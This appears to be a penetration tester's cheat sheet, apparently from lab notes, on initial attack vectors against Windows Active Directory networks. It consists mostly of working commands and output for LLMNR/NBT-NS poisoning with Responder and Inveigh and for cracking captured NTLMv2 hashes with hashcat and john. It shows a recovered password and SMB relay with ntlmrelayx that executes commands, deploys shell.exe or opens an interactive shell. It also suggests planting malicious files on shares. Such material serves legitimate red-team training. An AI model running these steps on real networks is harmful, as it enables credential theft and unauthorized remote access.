Skip to content

Initial Attack Vectors

we don't have user but we want to

LLMNR Poisoning (Captured NTLMv2 hash)

  • Attack type: MITM
  • Tool: Responder responder -I eth0 -rdwv (configuration Responder.conf)
    • Poisoners: LLMNR, NBT-NS, DNS/MDNS
    • Servers: All without Auth proxy
  • How: capture NTLMv2 hash and crack it with hashcat

From linux

responder 

sudo responder -I eth0 -rdwv
|->
# [SMB] NTLMv2-SSP Client   : 172.16.7.3
# [SMB] NTLMv2-SSP Username : INLANEFREIGHT\AB920
# [SMB] NTLMv2-SSP Hash     : AB920::INLANEFREIGHT:ff598dbec4942550:6AC6AF89BD9CD00048DEB772FF10BB93:0101000000000000805D6019FC80D901FF67866F18232E6B00000000020008004B005A004500300001001E00570049004E002D00580052004E005600440031003400350052003500590004003400570049004E002D00580052004E00560044003100340035005200350059002E004B005A00450030002E004C004F00430041004C00030014004B005A00450030002E004C004F00430041004C00050014004B005A00450030002E004C004F00430041004C0007000800805D6019FC80D90106000400020000000800300030000000000000000000000000200000D3BF77F7DF827BCA5200FE6E23EEA7C47F75349FAB77EF5E7F79485360AA27010A0010000000000000000000000000000000000009002E0063006900660073002F0049004E004C0041004E0045004600520049004700480054002E004C004F00430041004C00000000000000000000000000
hashcat - NTLMv2 hash 
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

From windows

Inveigh - powershell version install 

wget https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1 -O /opt/windows/Inveigh.ps1
run - (as Administrator) 
Import-Module .\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
|->
# [+] [2023-05-07T08:17:35] SMB(445) NTLMv2 captured for INLANEFREIGHT\CT059 from 172.16.7.3(DC01):65001:
#CT059::INLANEFREIGHT:060C1039B0C109F7:83B82D69B82786BA408D717170F2E885:0101000000000000B616E849E680D9013FE7F24F7FDD7B6C0000000002001A0049004E004C0041004E0045004600520045004900470048005400010008004D005300300031000400260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C00030030004D005300300031002E0049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C000500260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C0007000800B616E849E680D901060004000200000008003000300000000000000000000000002000004F928B0346B289CE796A2CE9E1CB7C93FB4ACC5567B05F8D08128DAA1D7D2C530A001000000000000000000000000000000000000900200063006900660073002F003100370032002E00310036002E0037002E0035003000000000000000000000000000


echo "CT059::INLANEFREIGHT:060C1039B0C109F7:83B82D69B82786BA408D717170F2E885:0101000000000000B616E849E680D9013FE7F24F7FDD7B6C0000000002001A0049004E004C0041004E0045004600520045004900470048005400010008004D005300300031000400260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C00030030004D005300300031002E0049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C000500260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C0007000800B616E849E680D901060004000200000008003000300000000000000000000000002000004F928B0346B289CE796A2CE9E1CB7C93FB4ACC5567B05F8D08128DAA1D7D2C530A001000000000000000000000000000000000000900200063006900660073002F003100370032002E00310036002E0037002E0035003000000000000000000000000000" > hash.txt
|->
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
|->
charlie1         (CT059)

InveighZero - C# version install 

wget https://github.com/Kevin-Robertson/Inveigh/releases/download/v2.0.9/Inveigh-net6.0-win-x64-trimmed-single-v2.0.9.zip -O /opt/windows/inveigh.zip

unzip /opt/windows/inveigh.zip -d /opt/windows/inveigh
run 
# run powershell as Admin
.\Inveigh.exe -Sniffer N
> Press ESC to enter/exit interactive console
>> HELP
>> GET NTLMV2UNIQUE
>> GET NTLMV2USERNAMES


hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

SMB Realay Atacks

  • Prerequisite
    • SMB signing has to be disabled or not required
      • nmap --script=smb2-security-mode.nse -p 445 192.168.57.0/24
        • Message signing enabled and required - That is blocker, we will not able to realay
        • Message signing enable but not required - That is what we need (add IP to targets.txt)
    • We will target Local Administrator hash
  • Attack type: MITM
  • Tool: Responder responder -I eth0 -rdwv (configuration /etc/responder/Responder.conf)
    • Poisoners: LLMNR, NBT-NS, DNS/MDNS
    • Servers: SMB = off and HTTP = off and (Auth proxy [OFF])
  • Tool: ntlmrelayx.py -tf targets.txt -smb2support from Impacket
  • How: capture NTLMv2 hash, and reuse hash to to access other machine responder 
    responder -I eth0 -rdwv
    ntlmrelayx (option 1) 
    /opt/tool/impacket/examples/ntlmrelayx.py -tf targets.txt -smb2support
    ntlmrelayx (option 2 - execute command) 
    /opt/tool/impacket/examples/ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
/opt/tool/impacket/examples/ntlmrelayx.py -tf targets.txt -smb2support -e shell.exe
    ntlmrelayx (option 3 - get interactive smb shell) 
    /opt/tool/impacket/examples/ntlmrelayx.py -tf targets.txt -smb2support -i
    conntect 
    nc 127.0.0.1 11000

Other

  • put malicious link-file (hashgrab) to smb share
  • put malicious doc file to smb share
  • put malicious doc file to ftp
  • force http request to server you own

Tools

Tool Description
Responder Responder is a purpose-built tool to poison LLMNR, NBT-NS, and MDNS, with many different functions.
Inveigh Inveigh is a cross-platform MITM platform that can be used for spoofing and poisoning attacks.
Metasploit Metasploit has several built-in scanners and spoofing modules made to deal with poisoning attacks.